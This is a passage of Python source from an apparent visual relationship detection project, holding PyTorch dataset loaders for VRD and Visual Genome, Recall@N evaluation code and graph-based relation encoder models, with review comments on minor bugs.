        # NOTE(review): the guard above is commented out, so the sizes below
        # overwrite the earlier values in BOTH train and test modes.
        self.num_nodes = 96 #63
        self.num_edges = self.num_nodes * (self.num_nodes-1)
        # ----------- senmantic feature ------------- #
        self.predicates_vec = np.load('./data/vrd_predicates_vec.npy')
        self.objects_vec = np.load('./data/vrd_objects_vec.npy')
        # ------------ original roidb feature --------#
        self.roidb_read = read_roidb('./data/vrd_rela_graph_roidb_iou_dis_{}_{}.npz'.format(0.5*10, 0.45*10))
        self.roidb = self.roidb_read[self.mode]
        # Exclude self edges
        self.off_diag_idx = np.ravel_multi_index(
            np.where(np.ones((self.num_nodes, self.num_nodes)) - np.eye(self.num_nodes)),
            [self.num_nodes, self.num_nodes])
        # ------------ prior probability ------------- #
        self.prior = prior  # re-assigned; same value as above
        # NOTE(review): file handle is never closed.
        f = open('./data/vrd_so_prior.pkl', 'rb')
        f.seek(0)
        self.rel_so_prior = pickle.load(f, encoding='bytes') #[100, 100, 70]
        self.use_loc = use_loc
    def get_adj(self, roidb_use):
        """Build edge/node class targets and edge<->node incidence matrices.

        Returns (edges, node_cls, rel_rec, rel_send, bbox_coordinates);
        edges/node_cls are int64 targets padded with the background class,
        rel_rec/rel_send are one-hot [num_edges, num_nodes] matrices.
        """
        bbox_coordinates = np.zeros([self.num_edges, 20])
        matrix = np.eye(self.num_nodes)
        rel_rec = np.zeros([self.num_edges, self.num_nodes])
        rel_send = np.zeros([self.num_edges, self.num_nodes])
        # Index of each detected subject/object box within the union box set.
        sub_idx = box_id(roidb_use['sub_box_dete'], roidb_use['uni_box_gt'])
        obj_idx = box_id(roidb_use['obj_box_dete'], roidb_use['uni_box_gt'])
        for i in range(len(sub_idx)):
            sub_id = int(sub_idx[i])
            obj_id = int(obj_idx[i])
            rel_rec[i] = matrix[obj_id]
            rel_send[i] = matrix[sub_id]
            bbox_coordinates[i] = get_box_feats(roidb_use['uni_box_gt'][sub_id], roidb_use['uni_box_gt'][obj_id])
        # Pad unused slots with the "no relation" / background class.
        edges = np.zeros(self.num_edges) + self.num_edge_types-1
        edges[:len(roidb_use['rela_dete'])] = roidb_use['rela_dete']
        edges = np.array(edges, dtype=np.int64)
        node_cls = np.zeros(self.num_nodes) + self.num_node_types-1
        node_cls[:len(roidb_use['uni_gt'])] = roidb_use['uni_gt']
        node_cls = np.array(node_cls, dtype=np.int64)
        return edges, node_cls, rel_rec, rel_send, bbox_coordinates
    def train_item(self, roidb_use):
        """Build node features, (currently all-zero) edge features, and the
        predicate prior matrix for one image graph."""
        # --------- node feature ------------#
        feats = np.load(roidb_use['uni_fc7'])
        w2vec = list(map(lambda x: self.objects_vec[int(x)], roidb_use['uni_gt']))
        w2vec = np.reshape(np.array(w2vec),[-1, 300])
        if feats.shape[0] > self.num_nodes:
            # Too many boxes: subsample num_nodes of them, sorted to keep the
            # original ordering. Assumes `random` is imported at module
            # level — not visible in this chunk; confirm.
            index_box = np.sort(random.sample(range(feats.shape[0]), self.num_nodes))
            feats = feats[index_box, :]
            w2vec = w2vec[index_box, :]
            if self.feat_mode == 'full':
                nodes = np.concatenate([feats, w2vec], 1) # [self.num_nodes, 4096+300]
            elif self.feat_mode == 'vis':
                nodes = feats
            elif self.feat_mode == 'sem':
                nodes = w2vec
            # --------- edge feature ------------#
            # edge_idx = roidb_use['edge_matrix'][index_box, :]
            # edge_idx = edge_idx[:, index_box] # [self.num_nodes, self.num_nodes]
        else:
            # Fewer boxes than slots: zero-pad up to num_nodes.
            if self.feat_mode == 'full':
                nodes = np.zeros([self.num_nodes, 4396])
                nodes[:feats.shape[0], :4096] = feats
                nodes[:feats.shape[0], 4096:] = w2vec # [self.num_nodes, 4096+300]
            elif self.feat_mode == 'vis':
                nodes = np.zeros([self.num_nodes, 4096])
                nodes[:feats.shape[0]] = feats
            elif self.feat_mode == 'sem':
                nodes = np.zeros([self.num_nodes, 300])
                nodes[:w2vec.shape[0]] = w2vec
        prior_matrix = np.zeros([self.num_edges, self.num_edge_types])-0.5/self.num_edge_types
        for i in range(len(roidb_use['rela_dete'])):
            sub_cls = int(roidb_use['sub_dete'][i])
            obj_cls = int(roidb_use['obj_dete'][i])
            current_prior = self.rel_so_prior[sub_cls, obj_cls]
            # current_prior = -0.5*(current_prior+1.0/self.num_edge_types)
            # The statistics-based prior above is disabled; a flat prior over
            # the real predicate classes overwrites the lookup result.
            current_prior = -0.5*(1.0/self.num_edge_types)
            prior_matrix[i, :(self.num_edge_types-1)] = current_prior
        # ------ region vgg feature --- initialize edge feature ---------#
        # NOTE(review): sub_idx/obj_idx are computed but unused here; edge
        # features stay all-zero since the pred_fc7 path is commented out.
        sub_idx = box_id(roidb_use['sub_box_dete'], roidb_use['uni_box_gt'])
        obj_idx = box_id(roidb_use['obj_box_dete'], roidb_use['uni_box_gt'])
        edge_feats = np.zeros([self.num_edges, 512])
        # pred_fc7 = np.load(roidb_use['pred_fc7'])
        # edge_feats[:len(roidb_use['rela_dete'])] = pred_fc7
        # for i in range(len(sub_idx)):
        #     edge_feats[int(sub_idx[i]),int(obj_idx[i])] = pred_fc7[i]
        # edge_feats = np.reshape(edge_feats, [self.num_nodes ** 2, -1])
        # edge_feats = edge_feats[self.off_diag_idx]
        return nodes, edge_feats, prior_matrix
    def __getitem__(self, index):
        """Return one image graph sample as torch tensors."""
        roidb_use = self.roidb[index]
        nodes, edge_feats, prior_matrix = self.train_item(roidb_use)
        edges, node_cls, rel_rec, rel_send, bbox_coordinates = self.get_adj(roidb_use)
        bbox_coordinates = torch.FloatTensor(bbox_coordinates)
        nodes = torch.FloatTensor(nodes)
        edges = torch.LongTensor(edges)
        node_cls = torch.LongTensor(node_cls)
        edge_feats = torch.FloatTensor(edge_feats)
        rel_rec = torch.FloatTensor(rel_rec)
        rel_send = torch.FloatTensor(rel_send)
        prior_matrix = torch.FloatTensor(prior_matrix)
        if self.prior:
            return nodes, edges, node_cls, edge_feats, rel_rec, rel_send, bbox_coordinates, prior_matrix
        else:
            return nodes, edges, node_cls, edge_feats, rel_rec, rel_send
    def __len__(self):
        """Number of image graphs in the current split."""
        return len(self.roidb)
class VgPredDataset(Dataset):
    """Visual Genome predicate-detection graph dataset.

    Candidate subject/object pairs are ground truth. Unlike the VRD variants,
    the statistics-based subject-object predicate prior IS applied here.
    """
    def __init__(self, mode = 'train', feat_mode = 'full', prior = False, ori_vgg=False, use_loc=False):
        # mode: 'train', anything else -> 'test'
        # feat_mode: 'full' (vis+sem), 'vis', or 'sem' node features
        # prior: if True, __getitem__ also returns box coords + prior matrix
        # ori_vgg: accepted for interface parity; not used here
        super(VgPredDataset, self).__init__()
        self.num_nodes = 110 #98
        self.num_edge_types = 101  # 100 VG predicates + "no relation" slot
        self.num_node_types = 201  # 200 VG object classes + background slot
        self.num_edges = 490 #352
        if mode == 'train':
            self.mode = 'train'
        else:
            self.mode = 'test'
        self.feat_mode = feat_mode
        self.prior = prior
        # ----------- senmantic feature ------------- #
        self.predicates_vec = np.load('./data/vg_predicates_vec.npy')
        self.objects_vec = np.load('./data/vg_objects_vec.npy')
        # ------------ original roidb feature --------#
        self.roidb_read = read_roidb('./data/vg_pred_graph_roidb.npz')
        self.roidb = self.roidb_read[self.mode]
        self.rel_so_prior = np.load('./data/vg_so_prior.npy') #[201, 201, 100]
        self.use_loc = use_loc
    def get_adj(self, roidb_use):
        """Build edge/node class targets and edge<->node incidence matrices
        from the ground-truth pairs.

        Returns (edges, node_cls, rel_rec, rel_send, bbox_coordinates);
        targets are padded with the background class.
        """
        bbox_coordinates = np.zeros([self.num_edges, 20])
        matrix = np.eye(self.num_nodes)
        rel_rec = np.zeros([self.num_edges, self.num_nodes])
        rel_send = np.zeros([self.num_edges, self.num_nodes])
        # Index of each GT subject/object box within the union box set.
        sub_idx = box_id(roidb_use['sub_box_gt'], roidb_use['uni_box_gt'])
        obj_idx = box_id(roidb_use['obj_box_gt'], roidb_use['uni_box_gt'])
        for i in range(len(sub_idx)):
            sub_id = int(sub_idx[i])
            obj_id = int(obj_idx[i])
            rel_rec[i] = matrix[obj_id]
            rel_send[i] = matrix[sub_id]
            bbox_coordinates[i] = get_box_feats(roidb_use['uni_box_gt'][sub_id], roidb_use['uni_box_gt'][obj_id])
        edges = np.zeros(self.num_edges) + self.num_edge_types - 1
        edges[:len(roidb_use['rela_gt'])] = roidb_use['rela_gt']
        edges = np.array(edges, dtype=np.int64)
        node_cls = np.zeros(self.num_nodes) + self.num_node_types-1
        node_cls[:len(roidb_use['uni_gt'])] = roidb_use['uni_gt']
        node_cls = np.array(node_cls, dtype=np.int64)
        return edges, node_cls, rel_rec, rel_send, bbox_coordinates
    def train_item(self, roidb_use):
        """Build node features, edge features, and the predicate prior
        matrix for one image graph."""
        if self.feat_mode == 'full':
            # --------- node feature ------------#
            feats = np.load(roidb_use['uni_fc7'])
            w2vec = list(map(lambda x: self.objects_vec[int(x)], roidb_use['uni_gt']))
            w2vec = np.reshape(np.array(w2vec),[-1, 300])
            nodes = np.zeros([self.num_nodes, 4396])
            nodes[:feats.shape[0], :4096] = feats
            nodes[:feats.shape[0], 4096:] = w2vec # [self.num_nodes, 4096+300]
        elif self.feat_mode == 'vis':
            feats = np.load(roidb_use['uni_fc7'])
            nodes = np.zeros([self.num_nodes, 4096])
            nodes[:feats.shape[0]] = feats
        elif self.feat_mode == 'sem':
            w2vec = list(map(lambda x: self.objects_vec[int(x)], roidb_use['uni_gt']))
            w2vec = np.reshape(np.array(w2vec),[-1, 300])
            nodes = np.zeros([self.num_nodes, 300])
            nodes[:w2vec.shape[0]] = w2vec
        # prior_matrix = np.zeros([self.num_edges, self.num_edge_types])
        # Background cells default to -0.5/K; rows of real pairs get the
        # statistics-based prior for their (subject, object) class pair.
        prior_matrix = np.zeros([self.num_edges, self.num_edge_types])-0.5/self.num_edge_types
        for i in range(len(roidb_use['rela_gt'])):
            sub_cls = int(roidb_use['sub_gt'][i])
            obj_cls = int(roidb_use['obj_gt'][i])
            current_prior = self.rel_so_prior[sub_cls, obj_cls]
            current_prior = -0.5*(current_prior+1.0/self.num_edge_types)
            # current_prior = -1.0*(current_prior+1.0/self.num_edge_types)
            prior_matrix[i, :(self.num_edge_types-1)] = current_prior
        # ------ region vgg feature --- initialize edge feature ---------#
        # sub_idx = box_id(roidb_use['sub_box_gt'], roidb_use['uni_box_gt'])
        # obj_idx = box_id(roidb_use['obj_box_gt'], roidb_use['uni_box_gt'])
        edge_feats = np.zeros([self.num_edges, 512])
        pred_fc7 = np.load(roidb_use['pred_fc7'])
        edge_feats[:len(roidb_use['rela_gt'])] = pred_fc7
        return nodes, edge_feats, prior_matrix
    def __getitem__(self, index):
        """Return one image graph sample as torch tensors."""
        roidb_use = self.roidb[index]
        nodes, edge_feats, prior_matrix = self.train_item(roidb_use)
        edges, node_cls, rel_rec, rel_send, bbox_coordinates = self.get_adj(roidb_use)
        nodes = torch.FloatTensor(nodes)
        edges = torch.LongTensor(edges)
        node_cls = torch.LongTensor(node_cls)
        edge_feats = torch.FloatTensor(edge_feats)
        rel_rec = torch.FloatTensor(rel_rec)
        rel_send = torch.FloatTensor(rel_send)
        prior_matrix = torch.FloatTensor(prior_matrix)
        bbox_coordinates = torch.FloatTensor(bbox_coordinates)
        if self.prior:
            return nodes, edges, node_cls, edge_feats, rel_rec, rel_send, bbox_coordinates, prior_matrix
        else:
            return nodes, edges, node_cls, edge_feats, rel_rec, rel_send
    def __len__(self):
        """Number of image graphs in the current split."""
        return len(self.roidb)
def load_dataset(data_set='vrd', ori_vgg=False, dataset='pred', level='image', batch_size=32, eval_batch_size=32, shuffle=False, feat_mode='full', prior=False):
    """Build train/val/test DataLoaders for the VRD/VG graph datasets.

    Args:
        data_set: 'vrd' selects the VRD datasets; anything else selects VG.
        ori_vgg: forwarded to the dataset constructors.
        dataset: 'pred' (ground-truth pairs) or 'rela' (detected pairs);
            only consulted when data_set == 'vrd'.
        level: only 'image'-level loading is supported for VRD.
        batch_size / eval_batch_size: loader batch sizes.
        shuffle: whether to shuffle the training loader.
        feat_mode: 'full' | 'vis' | 'sem' node-feature mode.
        prior: ignored; see NOTE below.

    Returns:
        (train_loader, val_loader, test_loader); val and test both wrap the
        test split and are never shuffled.

    Raises:
        ValueError: for an unsupported VRD dataset/level combination.
            (BUG FIX: the original left `load_func_name` unbound in that
            case and crashed later with a NameError.)
    """
    if data_set == 'vrd':
        if dataset == 'pred' and level == 'image':
            load_func_name = VrdPredDataset
        elif dataset == 'rela' and level == 'image':
            load_func_name = VrdRelaDataset
        else:
            raise ValueError(
                'unsupported vrd configuration: dataset={!r}, level={!r}'.format(dataset, level))
    else:
        load_func_name = VgPredDataset
    # NOTE(review): `prior` is forced to True here and the incoming argument
    # is ignored — kept as-is to preserve the original behavior.
    train_data = load_func_name(mode='train', feat_mode = feat_mode, prior=True, ori_vgg=ori_vgg)
    val_data = load_func_name(mode='test', feat_mode = feat_mode, prior=True, ori_vgg=ori_vgg)
    test_data = load_func_name(mode='test', feat_mode = feat_mode, prior=True, ori_vgg=ori_vgg)
    train_loader = DataLoader(train_data, shuffle=shuffle, batch_size=batch_size)
    val_loader = DataLoader(val_data, shuffle=False, batch_size=eval_batch_size)
    test_loader = DataLoader(test_data, shuffle=False, batch_size=eval_batch_size)
    return train_loader, val_loader, test_loader
--- FILE SEPARATOR ---
from __future__ import print_function
import numpy as np
import os
import ipdb
import time
from tqdm import tqdm
from utils import read_roidb, compute_iou_each
def graph_npy2roidb(roidb, pred_probs, pred_cls, mode='pred', level='image', topk=False):
    '''
    function: process the pred_probs and pred_cls to the roidb format;
    then the metric calculation functions can deal with them
    args:
    roidb: the ground truth roidb array of dict
    topk: get the top k highest predication
    pred_probs: the prediction probs of the predicate based on the input box pair
    shape: [N_GT_set, k]
    pred_cls: the prediction class of the predicate based on the input box pair
    shape: [N_GT_set, k]
    mode: 'pred' or 'rela'
    level: 'image' (per-image padded outputs, indexed by image) or
    'instance' (one flat array over all pairs, consumed with a running
    offset `start`)
    returns: {'pred_roidb': [...]} with one dict per image holding
    pred_rela, pred_rela_score and the subject/object boxes/classes
    '''
    def _output2roidb(roidb_use, output, output_score, mode='pred'):
        # Image-level outputs are padded to a fixed size; keep only the first
        # N_total real pairs of this image.
        if mode == 'pred':
            N_total = len(roidb_use['rela_gt'])
        else:
            N_total = len(roidb_use['rela_dete'])
        pred_rela = output[:N_total]
        pred_rela_score = output_score[:N_total]
        return pred_rela, pred_rela_score
    def _instance_output2roidb(start, roidb_use, output, output_score, mode='pred'):
        # Slice the next N_total rows of the flat prediction arrays.
        # NOTE(review): the `output`/`output_score` parameters are ignored —
        # this closure reads the outer pred_cls/pred_probs directly.
        if mode == 'pred':
            N_total = len(roidb_use['rela_gt'])
        else:
            N_total = len(roidb_use['rela_dete'])
        pred_rela = pred_cls[start:(start+N_total)]
        pred_rela_score = pred_probs[start:(start+N_total)]
        start += N_total
        return start, pred_rela, pred_rela_score
    pred_roidb = []
    N_data = len(roidb)
    start = 0
    if mode == 'pred':
        # Predicate detection: boxes and object classes come from ground truth.
        for i in range(N_data):
            roidb_use = roidb[i]
            if level == 'instance':
                start, pred_rela, pred_rela_score = _instance_output2roidb(start, roidb_use, pred_cls, pred_probs, mode=mode)
            else:
                pred_rela, pred_rela_score = _output2roidb(roidb_use, pred_cls[i], pred_probs[i], mode=mode)
            pred_roidb_temp = {'pred_rela': pred_rela, 'pred_rela_score': pred_rela_score,
                'sub_box_dete': roidb_use['sub_box_gt'], 'obj_box_dete': roidb_use['obj_box_gt'],
                'sub_dete': roidb_use['sub_gt'], 'obj_dete': roidb_use['obj_gt']}
            pred_roidb.append(pred_roidb_temp)
    elif mode == 'rela':
        # train set
        # NOTE(review): N_data > 1000 is a heuristic for "train split"; the
        # (smaller) test split additionally folds the detector's sub/obj
        # confidence into the predicate score below.
        if N_data > 1000:
            for i in range(N_data):
                roidb_use = roidb[i]
                if level == 'instance':
                    start, pred_rela, pred_rela_score = _instance_output2roidb(start, roidb_use, pred_cls, pred_probs, mode=mode)
                else:
                    pred_rela, pred_rela_score = _output2roidb(roidb_use, pred_cls[i], pred_probs[i], mode=mode)
                pred_roidb_temp = {'pred_rela': pred_rela, 'pred_rela_score': pred_rela_score,
                    'sub_box_dete': roidb_use['sub_box_dete'], 'obj_box_dete': roidb_use['obj_box_dete'],
                    'sub_dete': roidb_use['sub_dete'], 'obj_dete': roidb_use['obj_dete']}
                pred_roidb.append(pred_roidb_temp)
        else:
            for i in range(N_data):
                roidb_use = roidb[i]
                if level == 'instance':
                    start, pred_rela, pred_rela_score = _instance_output2roidb(start, roidb_use, pred_cls, pred_probs, mode=mode)
                else:
                    pred_rela, pred_rela_score = _output2roidb(roidb_use, pred_cls[i], pred_probs[i], mode=mode)
                # Combine (log) detector confidences with the predicate score.
                sub_score = roidb_use['sub_score']
                obj_score = roidb_use['obj_score']
                sub_obj_score = np.log(sub_score) + np.log(obj_score)
                # sub_obj_score = np.zeros_like(obj_score)
                if topk:
                    # Broadcast the detector score over all k predicate columns.
                    pred_rela_score = list(map(lambda i: sub_obj_score + pred_rela_score[:,i], range(pred_rela_score.shape[-1])))
                    pred_rela_score = np.array(pred_rela_score).T
                else:
                    pred_rela_score = pred_rela_score + sub_obj_score
                pred_roidb_temp = {'pred_rela': pred_rela, 'pred_rela_score': pred_rela_score,
                    'sub_box_dete': roidb_use['sub_box_dete'], 'obj_box_dete': roidb_use['obj_box_dete'],
                    # 'sub_dete': roidb_use['sub_dete']-1, 'obj_dete': roidb_use['obj_dete']-1}
                    'sub_dete': roidb_use['sub_dete'], 'obj_dete': roidb_use['obj_dete']}
                pred_roidb.append(pred_roidb_temp)
    roidb_temp = {}
    roidb_temp['pred_roidb'] = pred_roidb
    return roidb_temp
def compute_overlap(det_bboxes, gt_bboxes):
    """
    Compute overlap of detected and ground truth boxes.

    Inputs:
    - det_bboxes: array (2, 4), the detected subject and object boxes
    - gt_bboxes: array (2, 4), the ground-truth subject and object boxes
    Returns:
    - the smaller of the two IoUs (a non-negative float <= 1), i.e. the
      pair only overlaps as well as its worse-matched box
    """
    return min(
        compute_iou_each(det_bbox, gt_bbox)
        for det_bbox, gt_bbox in zip(det_bboxes, gt_bboxes)
    )
def roidb2list(test_roidb, pred_roidb, mode='pred', topk=False, is_zs=False, dataset='vrd'):
    """Flatten GT and predicted roidbs into per-image label/box lists for
    eval_result.

    Returns (det_labels, det_bboxes, gt_labels, gt_bboxes) where, per image:
        det_labels[i]: [n*k, 6] rows (1, pred_score, 1, sub_cls, pred_cls, obj_cls)
        det_bboxes[i]: [n*k, 2, 4] subject/object box pairs
        gt_labels[i]:  [m, 3] rows (sub_cls, pred_cls, obj_cls)
        gt_bboxes[i]:  [m, 2, 4]
    With is_zs=True, GT triplets are restricted to zero-shot ones via flag
    files loaded from hard-coded, machine-specific absolute paths.
    """
    N_data = len(test_roidb)
    # k = number of predicate hypotheses kept per pair when topk is set
    # (70 predicates for VRD, 100 for VG); otherwise 1.
    if topk:
        if dataset == 'vrd':
            k = 70
        else:
            k = 100
    else:
        k = 1
    # k = 70 if topk else 1
    det_labels = []
    det_bboxes = []
    for i in range(N_data):
        if mode == 'pred':
            n_dete = len(test_roidb[i]['rela_gt'])
        else:
            n_dete = len(test_roidb[i]['rela_dete'])
        conf_dete = np.ones([n_dete*k, 1])
        # Scores/classes are already [n, k]; sub/obj classes and boxes are
        # repeated k times to line up with the flattened predicate columns.
        dete_label = np.concatenate([conf_dete, \
            np.reshape(pred_roidb[i]['pred_rela_score'],[n_dete*k,1]),
            conf_dete,
            np.repeat(np.reshape(pred_roidb[i]['sub_dete'],[n_dete,1]),k,axis=0),
            np.reshape(pred_roidb[i]['pred_rela'],[n_dete*k,1]),
            np.repeat(np.reshape(pred_roidb[i]['obj_dete'],[n_dete,1]),k,axis=0)], 1)
        dete_box = np.repeat(np.concatenate([
            np.reshape(pred_roidb[i]['sub_box_dete'],[n_dete, 1, 4]),
            np.reshape(pred_roidb[i]['obj_box_dete'],[n_dete, 1, 4])], 1), k, axis=0)
        det_labels.append(dete_label)
        det_bboxes.append(dete_box)
    gt_labels = []
    gt_bboxes = []
    if is_zs:
        if dataset == 'vrd':
            zs_flag = np.load('/DATA5_DB8/data/yhu/NRI/dsr_data/dsr_zs.npy', encoding='bytes')
        else:
            zs_flag = read_roidb('/DATA5_DB8/data/yhu/VTransE/input/zeroshot_vg.npz')
    for i in range(N_data):
        if is_zs:
            # Keep only the triplets flagged as zero-shot for this image.
            if dataset == 'vrd':
                zs_index = np.where(zs_flag[i]==1)[0]
            else:
                zs_index = np.where(zs_flag[i]['zero_shot']==1)[0]
            rela_gt = test_roidb[i]['rela_gt'][zs_index]
            sub_gt = test_roidb[i]['sub_gt'][zs_index]
            obj_gt = test_roidb[i]['obj_gt'][zs_index]
            sub_box_gt = test_roidb[i]['sub_box_gt'][zs_index]
            obj_box_gt = test_roidb[i]['obj_box_gt'][zs_index]
        else:
            rela_gt = test_roidb[i]['rela_gt']
            sub_gt = test_roidb[i]['sub_gt']
            obj_gt = test_roidb[i]['obj_gt']
            sub_box_gt = test_roidb[i]['sub_box_gt']
            obj_box_gt = test_roidb[i]['obj_box_gt']
        n_gt = len(rela_gt)
        gt_label = np.concatenate([
            np.reshape(sub_gt, [n_gt,1]),
            np.reshape(rela_gt, [n_gt,1]),
            np.reshape(obj_gt, [n_gt,1])], 1)
        gt_box = np.concatenate([
            np.reshape(sub_box_gt, [n_gt, 1, 4]),
            np.reshape(obj_box_gt, [n_gt, 1, 4])], 1)
        gt_labels.append(gt_label)
        gt_bboxes.append(gt_box)
    return det_labels, det_bboxes, gt_labels, gt_bboxes
def eval_result(test_roidb, pred_roidb, N_recall, is_zs=False, mode='pred', topk=False, dataset='vrd'):
    """Compute Recall@N_recall over the test set.

    A ground-truth triplet counts as found when some top-scoring detection
    has the same (subject, predicate, object) labels and both of its boxes
    overlap the GT pair with IoU >= 0.5. Each GT triplet is matched at most
    once; each image contributes at most N_recall detections.

    Raises ZeroDivisionError if there are no GT relationships at all.
    """
    det_labels, det_bboxes, gt_labels, gt_bboxes = \
        roidb2list(test_roidb, pred_roidb, mode=mode, topk=topk, is_zs=is_zs, dataset=dataset)
    relationships_found = 0
    n_re = N_recall
    all_relationships = sum(labels.shape[0] for labels in gt_labels)
    for item in zip(det_labels, det_bboxes, gt_labels, gt_bboxes):
        (det_lbls, det_bxs, gt_lbls, gt_bxs) = item
        if not det_lbls.any() or not gt_lbls.any():
            continue # omit empty detection matrices
        gt_detected = np.zeros(gt_lbls.shape[0])
        # det_score = np.sum(np.log(det_lbls[:, 0:3]), axis=1)
        # Column 1 of det_lbls holds the predicate score (see roidb2list).
        det_score = det_lbls[:,1]
        inds = np.argsort(det_score)[::-1][:n_re] # at most n_re predictions
        for det_box, det_label in zip(det_bxs[inds, :], det_lbls[inds, 3:]):
            # Columns 3: are (sub_cls, pred_cls, obj_cls); a label mismatch
            # or an already-matched GT zeroes the overlap.
            # NOTE(review): since the >= 0.5 test below still requires a real
            # overlap >= 0.5, the 0.499 floor appears to only lift
            # label-matched pairs above the zeroed entries in argmax —
            # confirm the intent.
            overlaps = np.array([
                max(compute_overlap(det_box, gt_box), 0.499)
                if detected == 0 and not any(det_label - gt_label)
                else 0
                for gt_box, gt_label, detected
                in zip(gt_bxs, gt_lbls, gt_detected)
            ])
            if (overlaps >= 0.5).any():
                gt_detected[np.argmax(overlaps)] = 1
                relationships_found += 1
    return float(relationships_found / all_relationships)
--- FILE SEPARATOR ---
import torch
import torch.nn as nn
import torch.nn.functional as F
import math
import ipdb
import torch.utils.model_zoo as model_zoo
from torch.autograd import Variable
class FC(nn.Module):
    """A single fully-connected layer with an optional in-place ReLU."""

    def __init__(self, in_features, out_features, relu=True):
        super(FC, self).__init__()
        self.fc = nn.Linear(in_features, out_features)
        # `relu` is None when the layer should emit raw logits.
        self.relu = nn.ReLU(inplace=True) if relu else None

    def forward(self, x):
        out = self.fc(x)
        return out if self.relu is None else self.relu(out)
class MLP(nn.Module):
    """Two-layer fully-connected ELU net with batch norm.

    Operates on [num_sims, num_things, num_features] tensors; batch norm is
    applied over the flattened (num_sims * num_things) axis.
    """

    def __init__(self, n_in, n_hid, n_out, do_prob=0.):
        super(MLP, self).__init__()
        self.fc1 = nn.Linear(n_in, n_hid)
        self.fc2 = nn.Linear(n_hid, n_out)
        self.bn = nn.BatchNorm1d(n_out)
        self.dropout_prob = do_prob
        self.init_weights()

    def init_weights(self):
        """Xavier-init Linear weights (bias 0.1); BatchNorm to identity."""
        for module in self.modules():
            if isinstance(module, nn.Linear):
                nn.init.xavier_normal_(module.weight.data)
                module.bias.data.fill_(0.1)
            elif isinstance(module, nn.BatchNorm1d):
                module.weight.data.fill_(1)
                module.bias.data.zero_()

    def batch_norm(self, inputs):
        """Normalize over the flattened first two dims, keeping shape."""
        flat = inputs.view(inputs.size(0) * inputs.size(1), -1)
        normed = self.bn(flat)
        return normed.view(inputs.size(0), inputs.size(1), -1)

    def forward(self, inputs):
        # Input shape: [num_sims, num_things, num_features]
        hidden = F.elu(self.fc1(inputs))
        hidden = F.dropout(hidden, self.dropout_prob, training=self.training)
        return self.batch_norm(F.elu(self.fc2(hidden)))
class SimpleEncoder(nn.Module):
    """One-shot relation classifier (no message passing).

    Fuses per-pair visual, semantic, spatial, and box-location features and
    predicts the predicate directly. forward() returns
    (edge logits [B, E, edge_types], node-class logits [B, N, node_types]).
    """
    def __init__(self, n_hid, edge_types=71, node_types=101, do_prob=0., use_vis=True, use_spatial=True, use_sem=True, use_loc=False, use_cls=False):
        super(SimpleEncoder, self).__init__()
        self.use_vis = use_vis
        self.use_spatial = use_spatial
        self.use_sem = use_sem
        self.use_loc = use_loc
        self.use_cls = use_cls
        # self.vis_hid = int(n_hid/2)
        self.vis_hid = n_hid
        self.sem_hid = n_hid
        self.spatial_hid = n_hid
        self.loc_hid = 64
        self.cls_hid = 64
        # Per-modality projections into the hidden space.
        self.fc_vis = FC(4096, self.vis_hid)
        self.fc_spatial = FC(512, self.spatial_hid)
        self.fc_sem = FC(300, self.sem_hid)
        self.fc_loc = FC(20, self.loc_hid)
        # Width of the concatenated edge feature fed to fc_fusion.
        n_fusion = 0
        if self.use_vis:
            n_fusion += self.vis_hid
        if self.use_cls:
            n_fusion += self.cls_hid
        if self.use_spatial:
            n_fusion += self.spatial_hid
        if self.use_sem:
            n_fusion += self.sem_hid
        if self.use_loc:
            n_fusion += self.loc_hid
        # ---- sub obj concat ---------#
        self.fc_so_vis = FC(self.vis_hid*2, self.vis_hid)
        # ---- sub obj concat ---------#
        self.fc_so_sem = FC(self.sem_hid*2, self.sem_hid)
        # ---- all the feature into hidden space -------#
        self.fc_fusion = FC(n_fusion, n_hid)
        self.fc_rel = FC(n_hid, edge_types, relu=False)
        if self.use_vis:
            self.fc_cls = FC(4096, node_types, relu=False)
        else:
            self.fc_cls = FC(300, node_types, relu=False)
        self.fc_so_cls = FC(node_types*2, self.cls_hid)
        self.init_weights()
    def init_weights(self):
        """Xavier-init every Linear weight; biases to 0.1."""
        for m in self.modules():
            if isinstance(m, nn.Linear):
                nn.init.xavier_normal_(m.weight.data)
                m.bias.data.fill_(0.1)
    def node2edge(self, x, rel_rec, rel_send):
        """Concatenate receiver and sender node features for each edge."""
        receivers = torch.matmul(rel_rec, x)
        senders = torch.matmul(rel_send, x)
        edges = torch.cat([receivers, senders], dim=2)
        return edges
    def forward(self, inputs, spatial_feats, rel_rec, rel_send, bbox_loc):
        # inputs: presumably [B, N, 4096(+300)] node features, inferred from
        #   the 4096-column slicing below — confirm against the datasets.
        # spatial_feats: [B, E, 512]; bbox_loc: [B, E, 20].
        inputs = inputs[:, :, :].contiguous()
        x = inputs.view(inputs.size(0), inputs.size(1), -1)
        # New shape: [batch_size, num_nodes, num_dims]
        if self.use_vis:
            x_v = self.fc_vis(x[:, :, :4096]) #[batch_size, num_nodes, n_hid]
            e_hid_v = self.node2edge(x_v, rel_rec, rel_send) #[batch_size, num_edges, n_hid*2]
            e_v = self.fc_so_vis(e_hid_v) #[batch_size, num_edges, n_hid]
            edge_feats = e_v #[batch_size, num_edges, n_hid]
            x_cls = self.fc_cls(x[:, :, :4096])
            if self.use_cls:
                e_hid_cls = self.node2edge(x_cls, rel_rec, rel_send)
                e_cls = self.fc_so_cls(e_hid_cls)
                edge_feats = torch.cat([edge_feats, e_cls], -1)
        if self.use_sem:
            if self.use_vis:
                x_s = self.fc_sem(x[:, :, 4096:]) #[batch_size, num_nodes, n_hid]
            else:
                x_s = self.fc_sem(x)
                x_cls = self.fc_cls(x)
            e_hid_s = self.node2edge(x_s, rel_rec, rel_send) #[batch_size, num_edges, n_hid*2]
            e_s = self.fc_so_sem(e_hid_s) #[batch_size, num_edges, n_hid]
            if self.use_vis:
                edge_feats = torch.cat([edge_feats, e_s], -1) #[batch_size, num_edges, n_hid*2]
            else:
                edge_feats = e_s
        if self.use_spatial:
            e_l = self.fc_spatial(spatial_feats) #[batch_size, bun_edges, n_hid]
            if self.use_vis or self.use_sem:
                edge_feats = torch.cat([edge_feats, e_l], -1) #[batch_size, num_edges, n_hid*3]
            else:
                edge_feats = e_l
        if self.use_loc:
            e_loc = self.fc_loc(bbox_loc)
            edge_feats = torch.cat([edge_feats, e_loc], -1)
        # NOTE(review): if use_vis, use_sem and use_spatial are all False,
        # edge_feats and x_cls are never bound and the lines below raise.
        self.edge_feats_final = self.fc_fusion(edge_feats)
        output = self.fc_rel(self.edge_feats_final)
        return output, x_cls
class NMPEncoder(nn.Module):
    """Neural message-passing relation encoder.

    Projects node features (visual fc7 and/or word2vec) into a hidden space,
    runs one node->edge->node->edge message-passing round with a skip
